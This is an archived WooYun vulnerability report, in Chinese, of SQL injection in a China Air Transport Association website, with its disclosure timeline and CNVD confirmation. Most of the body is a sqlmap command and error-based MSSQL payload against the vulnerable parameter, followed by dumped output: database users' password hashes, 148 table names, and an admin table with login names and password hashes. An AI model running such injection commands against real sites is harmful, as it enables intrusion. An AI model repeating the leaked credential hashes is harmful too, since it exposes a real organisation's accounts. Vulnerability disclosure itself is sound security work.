乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-24: 细节已通知厂商并且等待厂商处理中 2015-10-28: 厂商已经确认,细节仅向厂商公开 2015-11-07: 细节向核心白帽子及相关领域专家公开 2015-11-17: 细节向普通白帽子公开 2015-11-27: 细节向实习白帽子公开 2015-12-12: 细节向公众公开
中国航空运输协会某处存在SQL注射漏洞(DBA权限/sa密码泄露/148个表/管理密码泄露)
测试地址:http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw
python sqlmap.py -u "http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw" --random-agent -p contentid --technique=E -D webplug_thxh -T AdminUser -C AdminUserID,LoginName,Password,Email --dump
---Parameter: contentid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user: 'sa'current user is DBA: Truedatabase management system users [3]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] sadatabase management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x0100b3d80630dbee3a8a58a74641cd043eeda38aaa96b010f27b header: 0x0100 salt: b3d80630 mixedcase: dbee3a8a58a74641cd043eeda38aaa96b010f27b[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x01007de408d88ab4c5e16cfd45bf2b5baab81df972382092ad9f header: 0x0100 salt: 7de408d8 mixedcase: 8ab4c5e16cfd45bf2b5baab81df972382092ad9f[*] sa [1]: password hash: 0x0100f65f10d1ed15a6fb82a41330e9446e9bb1da47eb42852edd header: 0x0100 salt: f65f10d1 mixedcase: ed15a6fb82a41330e9446e9bb1da47eb42852eddsqlmap resumed the following injection point(s) from stored session:---Parameter: contentid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap resumed the following injection point(s) from stored session:---Parameter: contentid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [6]:[*] master[*] model[*] msdb[*] tempdb[*] webplug_thxh[*] webplug_tyhksqlmap resumed the following injection point(s) from stored session:---Parameter: contentid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: webplug_thxh[148 tables]+-------------------------------+| AdminRole || AdminRoleMenu || AdminRoleNode || AdminUser || AdminUserRole || Component || ComponentAccessory || ComponentCategory || Email || Invitation || Job_001_Department || Node || NodeAccessory || NodeComponent || NodeGroup || NodeGroupRelation || NodeThumbnailPhoto || PositionCollection || PressRelease || Product || Recruitment || Replies || RepliesTB || Site || SiteLanguage || SupplyDemandRelease || SystemLogging || SystemMenu || TalentJob || Templet || ThumbnailPhoto || ad_001_Advertisement || ad_001_AdvertisementCouplet || ad_001_AdvertisementFloat || ad_001_AdvertisementPopWin || ad_001_AdvertisementTemplates || catalog_001_Category || catalog_001_Item || catalog_001_PhotoDetail || catalog_001_Review || city || dnt_admingroups || dnt_adminvisitlog || dnt_advertisements || dnt_announcements || dnt_attachments || dnt_attachpaymentlog || dnt_attachtypes || dnt_banned || dnt_bbcodes || dnt_bonuslog || dnt_creditslog || dnt_debatediggs || dnt_debates || dnt_failedlogins || dnt_favorites || dnt_forumfields || dnt_forumlinks || dnt_forums || dnt_help || dnt_invitation || dnt_locations || dnt_medals || dnt_medalslog || dnt_moderatormanagelog || dnt_moderators || dnt_myattachments || dnt_myposts || dnt_mytopics || dnt_navs || dnt_notices || dnt_online || dnt_onlinelist || dnt_onlinetime || dnt_orders || dnt_paymentlog || dnt_pms || dnt_polloptions || dnt_polls || dnt_postdebatefields || dnt_postid || dnt_posts1 || dnt_ratelog || dnt_scheduledevents || dnt_searchcaches || dnt_smilies || dnt_statistics || dnt_stats || dnt_statvars || dnt_tablelist || dnt_tags || dnt_templates || dnt_topicidentify || dnt_topics || dnt_topictagcaches || dnt_topictags || dnt_topictypes || dnt_trendstat || dnt_userfields || dnt_usergroups || dnt_users || dnt_words || form_001_Config || form_001_Form || imageviewer_001_Category || imageviewer_001_Group || imageviewer_001_Item || job_001_Job || job_003_Department || job_003_Job || job_003_uip_Certificate || job_003_uip_EducationHistory || job_003_uip_Province || job_003_uip_ResumeState || job_003_uip_TrainingHistory || job_003_uip_User || job_003_uip_WorkHistory || job_003_uip_v_Resume || job_004_Department || job_004_Job || job_004_State || job_004_User || member_001_Member || member_001_MemberDisplay || member_001_MemberType || message_001_Display || message_001_Message || message_001_Type || publication_001_Article || publication_001_Catalog || publication_001_Periodical || publication_001_Publication || research_001_Answer || research_001_Item || research_001_Paper || research_001_Question || thxh_Apply || thxh_Baike || thxh_BaikeAnswer || thxh_BaikeType || thxh_Collection || thxh_Comment || thxh_EnterpriseInfo || thxh_HrInfo || thxh_Message || thxh_TradeLeads || thxh_UserInfo || wp_Config |+-------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: contentid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: webplug_thxhTable: AdminUser[6 columns]+-------------+----------+| Column | Type |+-------------+----------+| AddTime | datetime || AdminUserID | int || Email | nvarchar || LoginName | nvarchar || Password | nvarchar || RealName | nvarchar |+-------------+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: contentid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: webplug_thxhTable: AdminUser[6 entries]+-------------+-----------+----------------------------------+------------------------+| AdminUserID | LoginName | Password | Email |+-------------+-----------+----------------------------------+------------------------+| 5 | yangy | 1184328ec3cae297298fc2efb934c413 | <blank> || 6 | zkqing | 317fe8866967ca216297b11f16810acd | <blank> || 3 | train | 4793a9bda9ce17f55ba9892102e5c079 | tongyonghk_scg@**.**.**.** || 7 | xhgz | a999652c5f65fda6700383af516fed78 | <blank> || 1 | admin | f588d7eb08c290ebd300a3cdf0c5bad2 | <blank> || 4 | hzxx | fb975e36766dc259d2cd68851c02e216 | tongyonghk_lry@**.**.**.** |+-------------+-----------+----------------------------------+------------------------+
增加过滤。
危害等级:高
漏洞Rank:11
确认时间:2015-10-28 14:44
CNVD确认所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置。
暂无